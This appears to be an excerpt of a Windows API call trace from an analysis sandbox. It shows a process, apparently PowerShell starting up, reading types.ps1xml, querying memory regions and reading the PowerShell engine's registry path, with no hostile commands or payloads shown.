	[0273.139] GetSystemInfo (in: lpSystemInfo=0xcc2c0 | out: lpSystemInfo=0xcc2c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0273.139] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.756] SetErrorMode (uMode=0x1) returned 0x1
	[0273.756] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0273.756] GetFileType (hFile=0x330) returned 0x1
	[0273.756] SetErrorMode (uMode=0x1) returned 0x1
	[0273.756] GetFileType (hFile=0x330) returned 0x1
	[0273.756] ReadFile (in: hFile=0x330, lpBuffer=0x2dafa18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2dafa18*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.765] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.765] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.765] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.766] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.766] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.766] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.766] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.766] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.767] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.767] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.768] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.768] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.768] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.768] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.769] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.769] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.770] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.770] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.771] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.771] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.771] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.771] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.772] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.772] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.772] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.772] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.773] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.773] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.773] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.773] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.774] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.774] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.776] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.776] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.777] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.777] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.777] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.777] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.778] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.778] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1000, lpOverlapped=0x0) returned 1
	[0273.778] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x1b4, lpOverlapped=0x0) returned 1
	[0273.778] ReadFile (in: hFile=0x330, lpBuffer=0x2c15780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd628, lpOverlapped=0x0 | out: lpBuffer=0x2c15780*, lpNumberOfBytesRead=0xcd628*=0x0, lpOverlapped=0x0) returned 1
	[0273.778] CloseHandle (hObject=0x330) returned 1
	[0273.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.779] SetErrorMode (uMode=0x1) returned 0x1
	[0273.779] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd5a0 | out: lpFileInformation=0xcd5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0273.779] SetErrorMode (uMode=0x1) returned 0x1
	[0273.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd688 | out: phkResult=0xcd688*=0x330) returned 0x0
	[0273.779] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd60c, lpData=0x0, lpcbData=0xcd608*=0x0 | out: lpType=0xcd60c*=0x1, lpData=0x0, lpcbData=0xcd608*=0x56) returned 0x0
	[0273.779] CoTaskMemAlloc (cb=0x5a) returned 0x1c5e30
	[0273.779] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5dc, lpData=0x1c5e30, lpcbData=0xcd5d8*=0x56 | out: lpType=0xcd5dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5d8*=0x56) returned 0x0
	[0273.779] CoTaskMemFree (pv=0x1c5e30) 
	[0273.779] RegCloseKey (hKey=0x330) returned 0x0
	[0273.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0273.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0274.839] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.842] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.843] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.843] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.843] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.843] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.844] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.251] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.259] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.260] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.260] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.265] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.270] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.270] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.271] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.271] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.271] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.272] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.272] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.272] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.272] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.273] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.273] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.273] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.273] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.275] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.277] VirtualQuery (in: lpAddress=0xcc380, lpBuffer=0xcd240, dwLength=0x30 | out: lpBuffer=0xcd240*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.277] VirtualQuery (in: lpAddress=0xcc380, lpBuffer=0xcd240, dwLength=0x30 | out: lpBuffer=0xcd240*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.277] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.278] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.406] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.406] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
